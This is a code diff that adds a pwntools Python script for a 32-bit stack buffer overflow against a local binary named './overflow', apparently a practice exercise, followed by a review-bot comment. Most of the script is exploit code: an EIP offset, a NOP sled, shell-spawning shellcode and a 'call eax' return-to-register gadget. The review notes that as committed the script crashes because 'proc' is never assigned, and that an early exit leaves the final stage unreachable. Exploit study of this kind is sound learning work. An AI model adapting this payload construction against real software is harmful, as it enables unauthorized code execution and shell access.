Showing
1 changed file
with
66 additions
and
0 deletions.
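--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,66 @@
+from pwn import *
+
+context(os='linux', arch='i386')
+context.log_level = "debug"
+
+# OFFSET to Control EIP
+OFFSET = 316
+
+TARGET = "./overflow"
+
+evil = shellcraft.sh()
+
+#print(evil)
+
+#import sys
+#sys.exit(0)
+
+# Load the Binary as a process
+#proc = process(TARGET)
+
+# Pause the Program to allow us to connect with GDB
+pause()
+
+# And Read the Data from it.
+out = proc.readuntil("Stack\n")
+print("First Line {0}".format(out))
+
+# Stage 1: Find the offset.
+# Send our payload to the Target
+#proc.writeline(cyclic(44))
+
+# Stage 2: Confirm we have control of the Instruction pointer.
+payload = b"A"
+payload += b"B"*40
+payload += b"ZZZZ"
+#payload += b"\x90"*(OFFSET-4)
+#payload += b"CBBC"
+proc.writeline(payload)
+
+import sys
+sys.exit(0)
+
+#EAX ADDRESS IS 0xffffcdd0
+#EAX_ADDR = 0xffffcdd0
+
+#With Ret 2 Reg we can use call EAX
+# find this with $objdump -D | grep call | grep eax
+
+CALL_EAX = 0x8049019
+
+payload = b"\x90"*10
+payload += asm(evil)
+payload += b"\x90"*(OFFSET - len(payload))
+#payload += b"BBBB"
+#payload += p32(EAX_ADDR)
+payload += p32(CALL_EAX)
+
+
+print("SANITY CHECK ON PAYLOAD LEN {0}".format(len(payload)))
+proc.writeline(payload)
+
+# Get the response back
+proc.interactive()
+#out =proc.read()
+
+print("Second Line {0}".format(out))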
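Review bot: As committed the script cannot get past `out = proc.readuntil("Stack\n")`, because `proc` is only assigned on the commented-out line `#proc = process(TARGET)`, so the first call after `pause()` raises NameError. The mid-file `import sys` / `sys.exit(0)` pair also makes everything from `#EAX ADDRESS IS ...` to the final `print` unreachable, and the earlier commented-out copy of the same two lines suggests stages are being toggled by editing comments. If the staged structure is intentional, a single `STAGE = 2` constant near the top with `if STAGE == 2: ...` guards around each section documents the workflow better than commented code, and `import sys` belongs with the other imports at the top of the file. The two magic numbers `OFFSET = 316` and `CALL_EAX = 0x8049019` are binary-specific; a comment on each stating which build of `./overflow` they were measured against would keep the file from silently going stale when the target is rebuilt.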